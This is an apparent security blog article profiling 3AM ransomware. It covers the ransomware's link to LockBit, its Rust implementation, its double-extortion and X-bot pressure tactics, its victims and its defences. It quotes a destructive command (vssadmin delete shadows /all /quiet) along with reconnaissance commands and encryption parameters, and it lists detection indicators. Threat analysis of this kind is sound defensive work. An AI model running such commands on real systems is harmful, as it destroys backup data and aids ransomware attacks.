Table of Contents
3AM ransomware is a relatively new entrant in the crowded ransomware landscape, first observed in late 2023. While its current impact appears limited, its unique characteristics, operational methods, and potential connections to other, more established ransomware groups make it a threat worth understanding. 3AM stands out for its use as a "fallback" payload when deployments of the notorious LockBit ransomware fail, its development in the Rust programming language, and its evolving tactics, including leveraging social media for extortion. This article provides a comprehensive overview of 3AM ransomware, covering its origins, tactics, targets, attack campaigns, and defense strategies, aiming to equip security professionals with the knowledge to combat this emerging threat.
Origins & Evolution
3AM ransomware emerged in the latter half of 2023, making it a relatively recent addition to the threat landscape. Its initial appearances were notable for their connection to failed deployments of LockBit, one of the most prolific and damaging ransomware families. This "fallback" role suggests a few possibilities:
Affiliate Activity: 3AM might be used by a less-experienced or opportunistic ransomware affiliate who relies on it when their primary tool (LockBit) is blocked or detected.
Strategic Diversification: More established threat actors could be using 3AM as a secondary payload to target systems where LockBit is known to be ineffective or to diversify their attack arsenal.
Testing Ground: 3AM could be a testing ground for new techniques or a less-valuable tool used in lower-stakes attacks before deploying more sophisticated ransomware.
While the exact nature of the relationship is unclear, the connection to LockBit is significant. Reports also indicate that the operators of 3AM are likely Russian-speaking, further aligning with the general profile of many LockBit affiliates. This is supported by the analysis of their leak site data and communication styles.
The use of the Rust programming language is another notable aspect of 3AM's evolution. While not entirely unique, Rust is less common than languages like C/C++ in ransomware development. The choice of Rust likely provides advantages in terms of performance (faster encryption), cross-platform compatibility, and potentially, evasion of some traditional security solutions that are less familiar with Rust-based malware.
Further, Intrinsec's research highlights the evolution of 3AM, stating strong connections between 3AM, the Conti syndicate, and the Royal ransomware gang. These connections are exhibited by the use of similar infrastructure, communication channels, and TTPs. There are also new tactics reported, like using bots on the X platform (formerly Twitter) to amplify attacks and spread news of breaches through victims' social media followers. Also, you can read about Chinese APT groups.
Tactics & Techniques
3AM ransomware follows a typical double-extortion model: data exfiltration followed by encryption, with the threat of publicly releasing stolen data if the ransom is not paid. However, its operational details reveal a specific set of tactics and techniques:
Initial Access: While the exact initial access vectors are not always clear, common ransomware infection methods are likely employed. This includes:
* Spear Phishing: Targeted emails with malicious attachments or links.
* Exploitation of Vulnerabilities: Targeting unpatched software or systems, particularly those exposed to the internet.
* Compromised Credentials: Using stolen or brute-forced credentials to gain access to systems.
Reconnaissance and Lateral Movement: Once inside a network, 3AM operators perform reconnaissance to understand the environment and move laterally to maximize impact. This involves:
* Using commands like whoami, netstat, quser, and net share to gather information about the system and network.
* Employing gpresult to extract policy settings.
* Enumerating other servers using quser and net view.
* Potentially using tools like Cobalt Strike for post-exploitation and lateral movement (observed in cases where 3AM was deployed after failed LockBit attempts).
Persistence: 3AM may establish persistence on compromised systems to ensure continued access. One observed method involves creating new user accounts.
Data Exfiltration: Before encryption, 3AM exfiltrates data to the attacker's infrastructure. This is often done using tools like
Wput, an FTP client. The exfiltrated data is then used as leverage in the extortion process.Service Termination: A critical step in 3AM's operation is the termination of a wide range of services, particularly those related to security, backup, and database software. This is done to prevent interference with the encryption process and to hinder recovery efforts. The extensive list of targeted services demonstrates a thorough approach to disabling defenses.
Encryption: 3AM encrypts files and appends the
.threeamtimeextension. It offers command-line parameters to customize the encryption process, similar to Conti ransomware:
* -k: Specifies the access key (32 Base64 characters).
* -m: Selects the encryption method ("local" or "net").
* -s: Controls offsets within files for encryption, affecting speed.
* -p and -h: parameters with unknown functions have also been found.
Volume Shadow Copy Deletion: To prevent easy recovery, 3AM attempts to delete Volume Shadow Copies using
vssadmin.exe delete shadows /all /quiet.Ransom Note: A ransom note named
RECOVER-FILES.txtis dropped in each encrypted folder. The note references "3 am" as a time of mysticism and threatens to sell the stolen data if the ransom is not paid. It provides a Tor URL and an access key for communication. More details about the Tor network.Extortion: It employs a double-extortion strategy, threatening to sell stolen data if the ransom is not paid. Also, it uses automated X (Twitter) bots to pressure victims - a new tactic where automated replies on X broadcast attacks, data leaks, and damage victim businesses' reputations.
File Marker: Encrypted files contain a distinct marker string "0x666".
Targets or Victimology
Analysis of 3AM ransomware attacks and leak site data reveals a targeting pattern that aligns with broader geopolitical trends and the likely motivations of the operators:
Geographic Focus: Primarily targets Western-affiliated countries, with a strong emphasis on NATO member states. The United States is the most frequently targeted country, followed by the United Kingdom and France. A smaller percentage of targets have been observed in Malaysia.
Industry Focus: While specific industry targeting data is limited, the known victims suggest a focus on organizations with valuable data or critical infrastructure. This includes:
* Healthcare (e.g., Brunswick Hospital Center in New York).
* Manufacturing and Industrial (e.g., a Louisiana-based HVAC company).
* Government (e.g., the city of Hoboken, New Jersey).
Opportunistic vs. Targeted: The use of 3AM as a fallback payload suggests a degree of opportunism. However, the targeting of specific organizations and the potential use of spear-phishing indicate that some attacks are likely more targeted.
Political Motivations: The focus on Western countries, particularly NATO members, suggests a possible political motivation, aligning with the broader geopolitical tensions involving Russia and Western nations. Learn more about cyber espionage.
Attack Campaigns
While 3AM ransomware is relatively new and has not been associated with a large number of publicly disclosed attacks, several incidents provide insights into its operations:
Failed LockBit Deployment (Initial Observation): The first documented use of 3AM occurred after a failed attempt to deploy LockBit ransomware. This incident highlighted 3AM's role as a secondary payload and provided valuable technical details about its operation.
Brunswick Hospital Center (New York): This attack demonstrated the real-world impact of 3AM, targeting a healthcare provider and potentially disrupting patient care.
Louisiana-based HVAC Company: This attack further illustrated 3AM's targeting of industrial and manufacturing sectors.
City of Hoboken (New Jersey): This attack involved the exfiltration and leakage of sensitive personal data and embarrassing content, showcasing the double-extortion tactics and the potential for reputational damage.
Numerous undisclosed attacks: As a relatively new ransomware, it is likely many attacks go unreported and/or uncredited, which makes it hard to gain deeper insights. Read about new ransomware.
Defenses
Protecting against 3AM ransomware, and ransomware in general, requires a multi-layered security approach that focuses on prevention, detection, and response:
Robust Email Security: Implement strong email filtering and security gateways to block phishing emails and malicious attachments. Train employees to recognize and report suspicious emails.
Vulnerability Management: Regularly scan for and patch vulnerabilities in software and systems, particularly those exposed to the internet. Prioritize patching of known exploited vulnerabilities. You can read about how I assessed vulnerabilities.
Endpoint Detection and Response (EDR): Deploy EDR solutions on all endpoints to detect and block malicious activity, including ransomware execution. Configure EDR to monitor for unusual process behavior, service terminations, and file modifications.
Network Segmentation: Segment the network to limit the lateral movement of attackers. This can contain the impact of a successful breach.
Least Privilege Access: Enforce the principle of least privilege, granting users only the access they need to perform their jobs. This reduces the potential damage from compromised accounts.
Multi-Factor Authentication (MFA): Implement MFA for all critical systems and accounts, particularly those with remote access.
Data Backup and Recovery: Maintain regular, offline backups of critical data. Test the backup and recovery process to ensure its effectiveness. Consider using the 3-2-1 backup rule (3 copies of data, on 2 different media, with 1 offsite copy).
Security Awareness Training: Educate employees about the risks of ransomware and social engineering tactics. Conduct regular phishing simulations to test awareness and reinforce best practices.
Incident Response Plan: Develop and regularly test an incident response plan that outlines procedures for containing and recovering from a ransomware attack. You should know about CIRP.
Monitor for Specific Indicators: Specifically for 3AM, monitor for:
* The creation of files with the .threeamtime extension.
* The presence of the RECOVER-FILES.txt ransom note.
* Unusual network activity associated with Wput or other FTP clients.
* Attempts to terminate a large number of services, especially those related to security and backup.
* Execution of commands like vssadmin.exe delete shadows.
Threat intelligence: Maintain knowledge of threat intelligence, especially regarding new and novel ransomware. SOAR helps for automation.
Conclusion
3AM ransomware, while relatively new, represents a growing threat in the evolving cybersecurity landscape. Its connection to LockBit, its use of Rust, its double-extortion tactics, and its focus on Western targets make it a significant concern for organizations. Although its current impact may be limited compared to more established ransomware families, its potential for growth and its evolving tactics, including social media extortion, warrant close attention. By understanding its origins, techniques, and targets, and by implementing robust, multi-layered security defenses, organizations can significantly reduce their risk of falling victim to 3AM and similar ransomware threats. Continuous monitoring, proactive threat intelligence gathering, and adaptive security strategies are crucial for staying ahead of this and other emerging cyber threats. Protect from DDoS attacks.
Found this article interesting? Keep visit thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive tips like this.
You may also like these articles:
Ransomware Payments Drop 35% in 2024 as Law Enforcement Disrupts Cybercrime
International Cybercrime Takedown: Four European Hackers Arrested in Phuket Ransomware Operation
AI-Driven Ransomware FunkSec Targets 85 Victims in December 2024
Morpheus and HellCat Ransomware Payloads Reveal Shared Codebase
Ransomware Actors Exploit SSH Tunneling to Target VMware ESXi Hosts
Arun KL
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
- February 24, 2025
- February 24, 2025
- February 24, 2025
- February 22, 2025
Learn Something New with Free Email subscription
Learn Something New with Free Email subscription
Subscribe
Subscribe
Subscribe
Subscribe
- February 24, 2025
- February 24, 2025
- February 24, 2025
- February 22, 2025
